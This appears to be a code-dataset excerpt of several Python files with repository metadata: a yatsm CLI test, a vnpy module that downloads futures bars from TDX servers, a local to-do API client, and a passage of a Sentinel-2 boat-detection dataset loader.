0b7ea2bf8223bfbee13d970f55dd6307562fcffc | 7,290 | py | Python | tests/cli/test_map_coef.py | TedrosGitHub/TSA-yatsm | 8e328f366c8fd94d5cc57cd2cc42080c43d1f391 | [
"MIT"
] | 59 | 2015-02-03T19:56:17.000Z | 2022-03-17T13:45:23.000Z | tests/cli/test_map_coef.py | TedrosGitHub/TSA-yatsm | 8e328f366c8fd94d5cc57cd2cc42080c43d1f391 | [
"MIT"
] | 97 | 2015-02-12T05:18:38.000Z | 2020-06-09T16:10:38.000Z | tests/cli/test_map_coef.py | TedrosGitHub/TSA-yatsm | 8e328f366c8fd94d5cc57cd2cc42080c43d1f391 | [
"MIT"
] | 35 | 2015-02-27T19:43:23.000Z | 2021-06-21T02:29:14.000Z | """ Test ``yatsm map coef ...``
"""
from click.testing import CliRunner
import numpy as np
from yatsm.cli.main import cli
# Truth for diagonals
diag = np.eye(5).astype(bool)
# Coefficient types
intercepts = np.arange(0, 7)
slopes = np.arange(7, 14)
seasonality_1 = np.arange(14, 21)
seasonality_2 = np.arange(21, 28)
dummies = np.arange(28, 35)
rmse = np.arange(35, 42)
all_coef = [intercepts, slopes, seasonality_1, seasonality_2, dummies, rmse]
# SWIR coefficients for Lasso20
coef_int_b5 = np.array([-9999., -16441.076172, 16221.29199219,
117207.890625, 393939.25], dtype=np.float32)
coef_slope_b5 = np.array([-9.99900000e+03, 2.333318e-02, -2.05697268e-02,
-1.55864090e-01, -5.34402490e-01], dtype=np.float32)
coef_season1_b5 = np.array([-9999., -3.76317239, -0., -0., -0.],
dtype=np.float32)
coef_season2_b5 = np.array([-9999., 112.587677, 165.92492676, 228.65888977,
255.87475586], dtype=np.float32)
coef_dummy_b5 = np.array([-9999., 0., -0., 0., -0.], dtype=np.float32)
coef_rmse_b5 = np.array([-9999., 113.20720673, 132.36845398, 140.73822021,
142.13438416], dtype=np.float32)
truths_b5 = [coef_int_b5, coef_slope_b5, coef_season1_b5, coef_season2_b5,
coef_dummy_b5, coef_rmse_b5]
coef_amp_b5 = np.array([-9999., 112.650551, 165.92492676, 228.65888977,
255.87475586], dtype=np.float32)
# TODO: SWIR coefficients for OLS
# TODO: SWIR coefficients for RLM
# INTENTIONAL PASSES
def test_map_coef_pass_1(example_results, tmpdir, read_image):
""" Make a map with reasonable inputs
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'coef', '2005-06-01', image
])
img = read_image(image)
assert result.exit_code == 0
assert img.shape == (42, 5, 5)
np.testing.assert_allclose(img[intercepts[4], diag], coef_int_b5)
np.testing.assert_allclose(img[slopes[4], diag], coef_slope_b5)
np.testing.assert_allclose(img[seasonality_1[4], diag], coef_season1_b5)
np.testing.assert_allclose(img[seasonality_2[4], diag], coef_season2_b5)
np.testing.assert_allclose(img[dummies[4], diag], coef_dummy_b5)
np.testing.assert_allclose(img[rmse[4], diag], coef_rmse_b5)
def test_map_coef_pass_2(example_results, tmpdir, read_image):
""" Make a map with reasonable inputs, selecting just one band
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'--band', '5',
'coef', '2005-06-01', image
])
img = read_image(image)
assert result.exit_code == 0
assert img.shape == (6, 5, 5)
np.testing.assert_allclose(img[0, diag], coef_int_b5)
np.testing.assert_allclose(img[1, diag], coef_slope_b5)
np.testing.assert_allclose(img[2, diag], coef_season1_b5)
np.testing.assert_allclose(img[3, diag], coef_season2_b5)
np.testing.assert_allclose(img[4, diag], coef_dummy_b5)
np.testing.assert_allclose(img[5, diag], coef_rmse_b5)
def test_map_coef_pass_3(example_results, tmpdir, read_image):
""" Make a map with reasonable inputs, selecting just one band and coef
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
idx_season = 0
coefs = ['intercept', 'slope', 'seasonality', 'seasonality', 'categorical',
'rmse']
for coef, idx_coef, truth in zip(coefs, all_coef, truths_b5):
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'--band', '5', '--coef', coef,
'coef', '2005-06-01', image
])
img = read_image(image)
assert result.exit_code == 0
if coef == 'seasonality': # seasonality has 2 bands
assert img.shape == (2, 5, 5)
band_index = idx_season
idx_season += 1
else:
band_index = 0
assert img.shape == (1, 5, 5)
np.testing.assert_allclose(img[band_index, diag], truth)
def test_map_coef_pass_amplitude(example_results, tmpdir, read_image):
""" Make a map with reasonable inputs, selecting just one band and
mapping only seasonality as amplitude
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'--band', '5', '--coef', 'seasonality', '--amplitude',
'coef', '2005-06-01', image
])
img = read_image(image)
assert result.exit_code == 0
assert img.shape == (1, 5, 5)
np.testing.assert_allclose(img[0, diag], coef_amp_b5)
# OLS REFIT RESULTS
def test_map_coef_pass_refit_OLS(example_results, tmpdir, read_image):
""" Make a map with refit OLS results
"""
image = tmpdir.join('ols_refitmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'--refit_prefix', 'ols',
'--band', '5', '--coef', 'intercept',
'coef', '2005-06-01', image
]
)
img = read_image(image)
assert result.exit_code == 0
assert img.shape == (1, 5, 5)
# INTENTIONAL FAILURES
def test_map_coef_fail_1(example_results, tmpdir, read_image):
""" Error because of non-existent --image (trigger click.BadParameter)
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', tmpdir.join('not_an_image.gtif').strpath,
'coef', '2005-06-01', image
])
assert result.exit_code == 2
assert 'Cannot find example image' in result.output
def test_map_coef_fail_2(example_results, tmpdir, read_image):
""" Error because of non-raster --image (trigger click.ClickException)
"""
image = tmpdir.join('coefmap.gtif').strpath
example = tmpdir.join('not_an_image.gtif').strpath
with open(example, 'w') as f:
f.write('some data')
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example,
'coef', '2005-06-01', image
])
assert result.exit_code == 1
assert 'Could not open example image' in result.output
| 36.268657 | 79 | 0.614952 | 941 | 7,290 | 4.578108 | 0.18491 | 0.084494 | 0.048747 | 0.074745 | 0.670845 | 0.630455 | 0.621866 | 0.586119 | 0.574977 | 0.415042 | 0 | 0.081256 | 0.235254 | 7,290 | 200 | 80 | 36.45 | 0.69148 | 0.096296 | 0 | 0.522581 | 0 | 0 | 0.11992 | 0 | 0 | 0 | 0 | 0.005 | 0.187097 | 1 | 0.045161 | false | 0.032258 | 0.019355 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b825a315a2a75e94903d59de68c01ab589ab275 | 15,818 | py | Python | vnpy/data/tdx/tdx_future_data.py | frikyalong/vnpy | d8ea554e34ff285c97cc2ddb4e881a1f0a6f02d3 | [
"MIT"
] | 1 | 2018-11-05T07:34:36.000Z | 2018-11-05T07:34:36.000Z | vnpy/data/tdx/tdx_future_data.py | frikyalong/vnpy | d8ea554e34ff285c97cc2ddb4e881a1f0a6f02d3 | [
"MIT"
] | null | null | null | vnpy/data/tdx/tdx_future_data.py | frikyalong/vnpy | d8ea554e34ff285c97cc2ddb4e881a1f0a6f02d3 | [
"MIT"
] | null | null | null | # encoding: UTF-8
# 从tdx下载期货数据.
# 收盘后的数据基本正确, 但盘中实时拿数据时:
# 1. 1Min的Bar可能不是最新的, 会缺几分钟.
# 2. 当周期>1Min时, 最后一根Bar可能不是完整的, 强制修改后
# - 5min修改后freq基本正确
# - 1day在VNPY合成时不关心已经收到多少Bar, 所以影响也不大
# - 但其它分钟周期因为不好精确到每个品种, 修改后的freq可能有错
from datetime import datetime, timezone, timedelta, time
import sys
import requests
import execjs
import traceback
from vnpy.trader.app.ctaStrategy.ctaBase import CtaBarData
from pytdx.exhq import TdxExHq_API
from pytdx.params import TDXParams
from vnpy.trader.vtFunction import getJsonPath
from vnpy.trader.vtGlobal import globalSetting
from vnpy.trader.vtObject import VtErrorData
import json
import pandas as pd
IP_LIST = [{'ip': '112.74.214.43', 'port': 7727},
{'ip': '59.175.238.38', 'port': 7727},
{'ip': '124.74.236.94', 'port': 7721},
{'ip': '218.80.248.229', 'port': 7721},
{'ip': '124.74.236.94', 'port': 7721},
{'ip': '58.246.109.27', 'port': 7721}
]
# 通达信 K 线种类
# 0 - 5 分钟K 线
# 1 - 15 分钟K 线
# 2 - 30 分钟K 线
# 3 - 1 小时K 线
# 4 - 日K 线
# 5 - 周K 线
# 6 - 月K 线
# 7 - 1 分钟
# 8 - 1 分钟K 线
# 9 - 日K 线
# 10 - 季K 线
# 11 - 年K 线
PERIOD_MAPPING = {}
PERIOD_MAPPING['1min'] = 8
PERIOD_MAPPING['5min'] = 0
PERIOD_MAPPING['15min'] = 1
PERIOD_MAPPING['30min'] = 2
PERIOD_MAPPING['1hour'] = 3
PERIOD_MAPPING['1day'] = 4
PERIOD_MAPPING['1week'] = 5
PERIOD_MAPPING['1month'] = 6
# 每个周期包含多少分钟 (估算值, 没考虑夜盘和10:15的影响)
NUM_MINUTE_MAPPING = {}
NUM_MINUTE_MAPPING['1min'] = 1
NUM_MINUTE_MAPPING['5min'] = 5
NUM_MINUTE_MAPPING['15min'] = 15
NUM_MINUTE_MAPPING['30min'] = 30
NUM_MINUTE_MAPPING['1hour'] = 60
NUM_MINUTE_MAPPING['1day'] = 60*24
NUM_MINUTE_MAPPING['1week'] = 60*24*7
NUM_MINUTE_MAPPING['1month'] = 60*24*7*30
# 常量
QSIZE = 500
ALL_MARKET_BEGIN_HOUR = 8
ALL_MARKET_END_HOUR = 16
class TdxFutureData(object):
api = None
connection_status = False # 连接状态
symbol_exchange_dict = {} # tdx合约与vn交易所的字典
symbol_market_dict = {} # tdx合约与tdx市场的字典
# ----------------------------------------------------------------------
def __init__(self, strategy):
"""
构造函数
:param strategy: 上层策略,主要用与使用strategy.writeCtaLog()
"""
self.strategy = strategy
self.connect()
def connect(self):
"""
连接API
:return:
"""
# 创建api连接对象实例
try:
if self.api is None or self.connection_status == False:
self.strategy.writeCtaLog(u'开始连接通达信行情服务器')
TdxFutureData.api = TdxExHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
# 选取最佳服务器
self.best_ip = self.select_best_ip()
self.api.connect(self.best_ip['ip'], self.best_ip['port'])
# 尝试获取市场合约统计
c = self.api.get_instrument_count()
if c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip['ip'], self.best_ip['port'])
self.strategy.writeCtaError(err_msg)
else:
self.strategy.writeCtaLog(u'创建tdx连接, IP: {}/{}'.format(self.best_ip['ip'], self.best_ip['port']))
# print(u'创建tdx连接, IP: {}/{}'.format(self.best_ip['ip'], self.best_ip['port']))
TdxFutureData.connection_status = True
# 更新 symbol_exchange_dict , symbol_market_dict
self.qryInstrument()
except Exception as ex:
self.strategy.writeCtaLog(u'连接服务器tdx异常:{},{}'.format(str(ex), traceback.format_exc()))
return
# ----------------------------------------------------------------------
def ping(self, ip, port=7709):
"""
ping行情服务器
:param ip:
:param port:
:param type_:
:return:
"""
apix = TdxExHq_API()
__time1 = datetime.now()
try:
with apix.connect(ip, port):
if apix.get_instrument_count() > 10000:
_timestamp = datetime.now() - __time1
self.strategy.writeCtaLog('服务器{}:{},耗时:{}'.format(ip,port,_timestamp))
return _timestamp
else:
self.strategy.writeCtaLog(u'该服务器IP {}无响应'.format(ip))
return timedelta(9, 9, 0)
except:
self.strategy.writeCtaError(u'tdx ping服务器,异常的响应{}'.format(ip))
return timedelta(9, 9, 0)
# ----------------------------------------------------------------------
def select_best_ip(self):
"""
选择行情服务器
:return:
"""
self.strategy.writeCtaLog(u'选择通达信行情服务器')
data_future = [self.ping(x['ip'], x['port']) for x in IP_LIST]
best_future_ip = IP_LIST[data_future.index(min(data_future))]
self.strategy.writeCtaLog(u'选取 {}:{}'.format(best_future_ip['ip'], best_future_ip['port']))
# print(u'选取 {}:{}'.format(best_future_ip['ip'], best_future_ip['port']))
return best_future_ip
# ----------------------------------------------------------------------
def qryInstrument(self):
"""
查询/更新合约信息
:return:
"""
if not self.connection_status:
return
if self.api is None:
self.strategy.writeCtaLog(u'取不到api连接,更新合约信息失败')
# print(u'取不到api连接,更新合约信息失败')
return
# 取得所有的合约信息
num = self.api.get_instrument_count()
if not isinstance(num,int):
return
all_contacts = sum([self.api.get_instrument_info((int(num / 500) - i) * 500, 500) for i in range(int(num / 500) + 1)],[])
#[{"category":category,"market": int,"code":sting,"name":string,"desc":string},{}]
# 对所有合约处理,更新字典 指数合约-tdx市场,指数合约-交易所
for tdx_contract in all_contacts:
tdx_symbol = tdx_contract.get('code', None)
if tdx_symbol is None:
continue
tdx_market_id = tdx_contract.get('market')
if tdx_market_id == 47: # 中金所
TdxFutureData.symbol_exchange_dict.update({tdx_symbol: 'CFFEX'})
TdxFutureData.symbol_market_dict.update({tdx_symbol:tdx_market_id})
elif tdx_market_id == 28: # 郑商所
TdxFutureData.symbol_exchange_dict.update({tdx_symbol: 'CZCE'})
TdxFutureData.symbol_market_dict.update({tdx_symbol:tdx_market_id})
elif tdx_market_id == 29: # 大商所
TdxFutureData.symbol_exchange_dict.update({tdx_symbol: 'DCE'})
TdxFutureData.symbol_market_dict.update({tdx_symbol:tdx_market_id})
elif tdx_market_id == 30: # 上期所+能源
TdxFutureData.symbol_exchange_dict.update({tdx_symbol: 'SHFE'})
TdxFutureData.symbol_market_dict.update({tdx_symbol:tdx_market_id})
# ----------------------------------------------------------------------
def get_bars(self, symbol, period, callback, bar_is_completed=False, bar_freq=1, start_dt=None):
"""
返回k线数据
symbol:合约
period: 周期: 1min,3min,5min,15min,30min,1day,3day,1hour,2hour,4hour,6hour,12hour
"""
ret_bars = []
tdx_symbol = symbol.upper().replace('_' , '')
tdx_symbol = tdx_symbol.replace('99' , 'L9')
if tdx_symbol not in self.symbol_exchange_dict.keys():
self.strategy.writeCtaError(u'{} 合约{}/{}不在下载清单中: {}'.format(datetime.now(), symbol, tdx_symbol, self.symbol_exchange_dict.keys()))
# print(u'{} 合约{}/{}不在下载清单中: {}'.format(datetime.now(), symbol, tdx_symbol, self.symbol_exchange_dict.keys()))
return False,ret_bars
if period not in PERIOD_MAPPING.keys():
self.strategy.writeCtaError(u'{} 周期{}不在下载清单中: {}'.format(datetime.now(), period, list(PERIOD_MAPPING.keys())))
# print(u'{} 周期{}不在下载清单中: {}'.format(datetime.now(), period, list(PERIOD_MAPPING.keys())))
return False,ret_bars
if self.api is None:
return False,ret_bars
tdx_period = PERIOD_MAPPING.get(period)
if start_dt is None:
self.strategy.writeCtaLog(u'没有设置开始时间,缺省为10天前')
qry_start_date = datetime.now() - timedelta(days=10)
else:
qry_start_date = start_dt
end_date = datetime.combine(datetime.now() + timedelta(days=1),time(ALL_MARKET_END_HOUR, 0))
if qry_start_date > end_date:
qry_start_date = end_date
self.strategy.writeCtaLog('{}开始下载tdx:{} {}数据, {} to {}.'.format(datetime.now(), tdx_symbol, tdx_period, qry_start_date, end_date))
# print('{}开始下载tdx:{} {}数据, {} to {}.'.format(datetime.now(), tdx_symbol, tdx_period, last_date, end_date))
try:
_start_date = end_date
_bars = []
_pos = 0
while _start_date > qry_start_date:
_res = self.api.get_instrument_bars(
PERIOD_MAPPING[period],
self.symbol_market_dict[tdx_symbol],
tdx_symbol,
_pos,
QSIZE)
if _res is not None:
_bars = _res + _bars
_pos += QSIZE
if _res is not None and len(_res) > 0:
_start_date = _res[0]['datetime']
_start_date = datetime.strptime(_start_date, '%Y-%m-%d %H:%M')
self.strategy.writeCtaLog(u'分段取数据开始:{}'.format(_start_date))
else:
break
if len(_bars) == 0:
self.strategy.writeCtaError('{} Handling {}, len1={}..., continue'.format(
str(datetime.now()), tdx_symbol, len(_bars)))
return False, ret_bars
current_datetime = datetime.now()
data = self.api.to_df(_bars)
data = data.assign(datetime=pd.to_datetime(data['datetime']))
data = data.assign(ticker=symbol)
data['instrument_id'] = data['ticker']
# if future['market'] == 28 or future['market'] == 47:
# # 大写字母: 郑州商品 or 中金所期货
# data['instrument_id'] = data['ticker']
# else:
# data['instrument_id'] = data['ticker'].apply(lambda x: x.lower())
data['symbol'] = symbol
data = data.drop(
['year', 'month', 'day', 'hour', 'minute', 'price', 'amount', 'ticker'],
errors='ignore',
axis=1)
data = data.rename(
index=str,
columns={
'position': 'open_interest',
'trade': 'volume',
})
if len(data) == 0:
print('{} Handling {}, len2={}..., continue'.format(
str(datetime.now()), tdx_symbol, len(data)))
return False, ret_bars
data['total_turnover'] = data['volume']
data["limit_down"] = 0
data["limit_up"] = 999999
data['trading_date'] = data['datetime']
data['trading_date'] = data['trading_date'].apply(lambda x: (x.strftime('%Y-%m-%d')))
monday_ts = data['datetime'].dt.weekday == 0 # 星期一
night_ts1 = data['datetime'].dt.hour > ALL_MARKET_END_HOUR
night_ts2 = data['datetime'].dt.hour < ALL_MARKET_BEGIN_HOUR
data.loc[night_ts1, 'datetime'] -= timedelta(days=1) # 所有日期的夜盘(21:00~24:00), 减一天
monday_ts1 = monday_ts & night_ts1 # 星期一的夜盘(21:00~24:00), 再减两天
data.loc[monday_ts1, 'datetime'] -= timedelta(days=2)
monday_ts2 = monday_ts & night_ts2 # 星期一的夜盘(00:00~04:00), 再减两天
data.loc[monday_ts2, 'datetime'] -= timedelta(days=2)
# data['datetime'] -= timedelta(minutes=1) # 直接给Strategy使用, RiceQuant格式, 不需要减1分钟
data['dt_datetime'] = data['datetime']
data['date'] = data['datetime'].apply(lambda x: (x.strftime('%Y-%m-%d')))
data['time'] = data['datetime'].apply(lambda x: (x.strftime('%H:%M:%S')))
data['datetime'] = data['datetime'].apply(lambda x: float(x.strftime('%Y%m%d%H%M%S')))
data = data.set_index('dt_datetime', drop=False)
# data = data[int(last_date.strftime('%Y%m%d%H%M%S')):int(end_date.strftime('%Y%m%d%H%M%S'))]
# data = data[str(last_date):str(end_date)]
for index, row in data.iterrows():
add_bar = CtaBarData()
try:
add_bar.vtSymbol = row['symbol']
add_bar.symbol = row['symbol']
add_bar.datetime = index
add_bar.date = row['date']
add_bar.time = row['time']
add_bar.tradingDay = row['trading_date']
add_bar.open = float(row['open'])
add_bar.high = float(row['high'])
add_bar.low = float(row['low'])
add_bar.close = float(row['close'])
add_bar.volume = float(row['volume'])
except Exception as ex:
self.strategy.writeCtaError('error when convert bar:{},ex:{},t:{}'.format(row, str(ex), traceback.format_exc()))
# print('error when convert bar:{},ex:{},t:{}'.format(row, str(ex), traceback.format_exc()))
return False
if start_dt is not None and index < start_dt:
continue
ret_bars.append(add_bar)
if callback is not None:
freq = bar_freq
bar_is_completed = True
if period != '1min' and index == data['dt_datetime'][-1]:
# 最后一个bar,可能是不完整的,强制修改
# - 5min修改后freq基本正确
# - 1day在VNPY合成时不关心已经收到多少Bar, 所以影响也不大
# - 但其它分钟周期因为不好精确到每个品种, 修改后的freq可能有错
if index > current_datetime:
bar_is_completed = False
# 根据秒数算的话,要+1,例如13:31,freq=31,第31根bar
freq = NUM_MINUTE_MAPPING[period] - int((index - current_datetime).total_seconds() / 60)
callback(add_bar, bar_is_completed, freq)
return True,ret_bars
except Exception as ex:
self.strategy.writeCtaError('exception in get:{},{},{}'.format(tdx_symbol,str(ex), traceback.format_exc()))
# print('exception in get:{},{},{}'.format(tdx_symbol,str(ex), traceback.format_exc()))
self.strategy.writeCtaLog(u'重置连接')
TdxFutureData.api = None
self.connect()
return False,ret_bars
if __name__ == "__main__":
class T(object):
def writeCtaError(self,content):
print(content,file=sys.stderr)
def writeCtaLog(self,content):
print(content)
def display_bar(self,bar, bar_is_completed=True, freq=1):
print(u'{} {}'.format(bar.vtSymbol,bar.datetime))
t1 = T()
t2 = T()
# 创建API对象
api_01 = TdxFutureData(t1)
# 获取历史分钟线
api_01.get_bars('rb1905', period='5min', callback=t1.display_bar)
# api.get_bars(symbol, period='5min', callback=display_bar)
# api_01.get_bars('IF99', period='1day', callback=t1.display_bar)
# 测试单实例
# api_02 = TdxFutureData(t2)
#api_02.get_bars('IF99', period='1min', callback=t1.display_bar) | 41.408377 | 143 | 0.528954 | 1,752 | 15,818 | 4.577626 | 0.224886 | 0.026933 | 0.034414 | 0.029925 | 0.313591 | 0.245387 | 0.209975 | 0.158479 | 0.131047 | 0.121571 | 0 | 0.031958 | 0.319509 | 15,818 | 382 | 144 | 41.408377 | 0.713118 | 0.177456 | 0 | 0.142276 | 0 | 0 | 0.087785 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036585 | false | 0 | 0.052846 | 0 | 0.178862 | 0.01626 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b860fbcd0db0ce753a72fb029b2b9026ebfb76b | 1,515 | py | Python | AmI-Labs/lab_6/client.py | AndreaCossio/PoliTo-Projects | f89c8ce1e04d54e38a1309a01c7e3a9aa67d5a81 | [
"MIT"
] | null | null | null | AmI-Labs/lab_6/client.py | AndreaCossio/PoliTo-Projects | f89c8ce1e04d54e38a1309a01c7e3a9aa67d5a81 | [
"MIT"
] | null | null | null | AmI-Labs/lab_6/client.py | AndreaCossio/PoliTo-Projects | f89c8ce1e04d54e38a1309a01c7e3a9aa67d5a81 | [
"MIT"
] | 1 | 2022-02-19T11:26:30.000Z | 2022-02-19T11:26:30.000Z | import requests
base_url = 'http://localhost:5000/tasks'
def list_tasks():
r = requests.get(base_url)
return r.json()
def task(task_id):
url = base_url + '/' + str(task_id)
r = requests.get(url)
if r.status_code == 200:
return r.json()
else:
return None
def add_task(todo, urgent):
new_task = {"todo": todo,
"urgent": urgent}
r = requests.post(base_url, json=new_task)
if r.status_code == 201:
return r.json()
else:
return None
def update_task(task_id, todo, urgent):
upd_task = {"todo": todo,
"urgent": urgent}
url = base_url + '/' + str(task_id)
r = requests.put(url, json=upd_task)
if r.status_code == 200:
return r.json()
else:
return None
def delete_task(task_id):
r = requests.delete(base_url + '/' + str(task_id))
if r.status_code == 200:
return r.json()
else:
return None
if __name__ == '__main__':
print("Example of the full list got with GET")
print(list_tasks())
print("\nExamples of a single task got with GET")
print(task(1))
print(task(2))
print("\nExample of a single task created with POST")
print(add_task('buy eggs', 0))
print(list_tasks())
print("\nExample of a single task updated with PUT")
print(update_task(2, "buy a new mouse", 0))
print(list_tasks())
print("\nExample of a single task deleted with DELETE")
print(delete_task(3))
print(list_tasks())
| 22.279412 | 59 | 0.60132 | 220 | 1,515 | 3.963636 | 0.254545 | 0.048165 | 0.063073 | 0.059633 | 0.465596 | 0.368119 | 0.338303 | 0.306193 | 0.241972 | 0.241972 | 0 | 0.019802 | 0.266667 | 1,515 | 67 | 60 | 22.61194 | 0.765077 | 0 | 0 | 0.48 | 0 | 0 | 0.192079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.02 | 0 | 0.3 | 0.28 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8651b966dc2e3855a5c2959144ad8e960d0050 | 8,964 | py | Python | src/dataset.py | MichelDeudon/sentinel2-xcube-boat-detection | 8dd6f9894c5a535f13e74e717704b79d6ae8e15b | [
"CC-BY-4.0"
] | 6 | 2020-07-14T20:01:53.000Z | 2021-12-26T22:57:41.000Z | src/dataset.py | MichelDeudon/sentinel2-xcube-boat-detection | 8dd6f9894c5a535f13e74e717704b79d6ae8e15b | [
"CC-BY-4.0"
] | null | null | null | src/dataset.py | MichelDeudon/sentinel2-xcube-boat-detection | 8dd6f9894c5a535f13e74e717704b79d6ae8e15b | [
"CC-BY-4.0"
] | null | null | null | import os
import numpy as np
import pandas as pd
import warnings
import sys
import matplotlib.pyplot as plt
import plotly.express as px
from sklearn.model_selection import train_test_split
import skimage
from skimage.io import imread
import glob
from pathlib import Path
import torch
from torch.utils.data import Dataset
def plot_geoloc(train_coordinates, val_coordinates=None):
"""
Args:
train_coordinates: list of (lat,lon)
val_coordinates: list of (lat,lon)
Returns:
MapboxPlot of region
"""
if val_coordinates is not None:
df = pd.DataFrame(train_coordinates+val_coordinates, columns=['lat', 'lon'])
df.insert(2, "color", [0]*len(train_coordinates)+[1]*len(val_coordinates), True)
else:
df = pd.DataFrame(train_coordinates, columns=['lat', 'lon'])
df.insert(2, "color", [0]*len(train_coordinates), True)
mapbox_access_token = os.environ['mapbox_access_token'] # Mapbox access token
px.set_mapbox_access_token(mapbox_access_token)
if val_coordinates is not None:
fig = px.scatter_mapbox(df, lon="lon", lat="lat", color='color', zoom=2, color_continuous_scale=px.colors.sequential.Bluered, width=1024, height=768)
else:
fig = px.scatter_mapbox(df, lon="lon", lat="lat", color='color', zoom=2, color_continuous_scale=px.colors.sequential.Greens, width=1024, height=768)
return fig
def getImageSetDirectories(data_dir='data/chips', labels_filename='data/labels.csv', band_list=['img_ndwi'], test_size=0.1, plot_coords=True,
plot_class_imbalance=True, seed=123):
""" Return list of list of paths to filenames for training and validation (KFold)
Args:
data_dir: str, path to chips folder.
band_list: list of str, from img_ndwi, img_02, img_03, img_04, img_08 and optionally bg_ndwi, bg_02, bg_03, bg_04, bg_08.
test_size: float, proportion of locations for validation
plot_coords: bool, plot coordinates with mapbox
plot_class_imbalance: bool, plot target histograms (train, val labels)
Returns:
train_img_paths, val_img_paths: list of (list of list of str)
fig: mapbox plot of coordinates if plot_coords is True. Otherwise, returns None.
"""
df_labels = pd.read_csv(labels_filename, dtype={'count': float})
df_labels = df_labels[df_labels["count"] >= 0.0] # keep positive counts
df_labels_groupby = df_labels.groupby("lat_lon")
coordinates = np.array(list(df_labels_groupby.groups.keys()))
train_coordinates, val_coordinates = train_test_split(coordinates, test_size=test_size, random_state=seed, shuffle=True) # split train/val coordinates
def get_img_paths(coordinates):
img_paths = []
for subdir in coordinates:
timestamps = df_labels_groupby.get_group(name = subdir)["timestamp"] # if count is negative, will not appear in the group
for timestamp in timestamps:
img_timestamp = []
for band in band_list: # img_08, bg_ndwi, img_clp
if band.startswith('img_'):
img_timestamp.extend(glob.glob(os.path.join(data_dir, subdir, band + "*t_" + timestamp + "*.png")))
else:
img_timestamp.extend(glob.glob(os.path.join(data_dir, subdir, band + "*.png")))
if len(img_timestamp)==len(band_list): ##### sanity check (BUG for certain coords / chips)
img_paths.append(img_timestamp)
else:
print('Assertion error', len(img_timestamp),len(band_list),img_timestamp)
return np.array(img_paths)
train_img_paths = get_img_paths(train_coordinates) # get list of filenames
val_img_paths = get_img_paths(val_coordinates)
print("Found {0} coordinates ({1} chips): {2} train ({3} chips) / {4} val ({5} chips)".format(len(coordinates), len(train_img_paths)+len(val_img_paths), len(train_coordinates), len(train_img_paths), len(val_coordinates), len(val_img_paths)))
fig = None
if plot_coords is True:
train_coords = [coord.replace('lat_','').split('_lon_') for coord in train_coordinates]
train_coords = [ (float(coord[0].replace('_','.')), float(coord[1].replace('_','.'))) for coord in train_coords]
val_coords = [coord.replace('lat_','').split('_lon_') for coord in val_coordinates]
val_coords = [ (float(coord[0].replace('_','.')), float(coord[1].replace('_','.'))) for coord in val_coords]
fig = plot_geoloc(list(train_coords), list(val_coords))
if plot_class_imbalance is True:
if not sys.warnoptions:
warnings.simplefilter("ignore")
plt.figure(1, figsize=(20,5))
plt.subplot(131)
df_labels[df_labels['lat_lon'].isin(train_coordinates)]['count'].hist(color='blue')
plt.xlabel('label')
plt.ylabel('counts (train)')
plt.subplot(132)
df_labels[df_labels['lat_lon'].isin(val_coordinates)]['count'].hist(color='red')
plt.xlabel('label')
plt.ylabel('counts (val)')
plt.subplot(133)
n_chips_per_coords = [len([filename for filename in os.listdir(data_dir+'/'+coord) if filename.startswith('img_08')]) for coord in os.listdir(data_dir)]
n_chips_per_coords = [k for k in n_chips_per_coords if k>0]
plt.xlabel('# chips / coordinates')
plt.xlabel('counts')
plt.hist(n_chips_per_coords, color='black')
plt.title('Mean: {:.2f} / Range: [{} {}]'.format(np.mean(n_chips_per_coords), np.min(n_chips_per_coords), np.max(n_chips_per_coords)))
plt.show()
return train_img_paths, val_img_paths, fig
class S2_Dataset(Dataset):
""" Derived Dataset class for loading imagery from an imset_dir."""
def __init__(self, imset_dir, augment=True, crop_size=2, labels_filename='data/labels.csv'):
super().__init__()
self.img_paths = imset_dir
self.augment = augment
self.crop_size = crop_size # if self.augment is True
self.df_labels = pd.read_csv(labels_filename)
def __len__(self):
return len(self.img_paths)
def __getitem__(self, index):
""" Returns an ImageSet for the given index (int)."""
if not isinstance(index, int):
raise KeyError('index must be int')
imset = {}
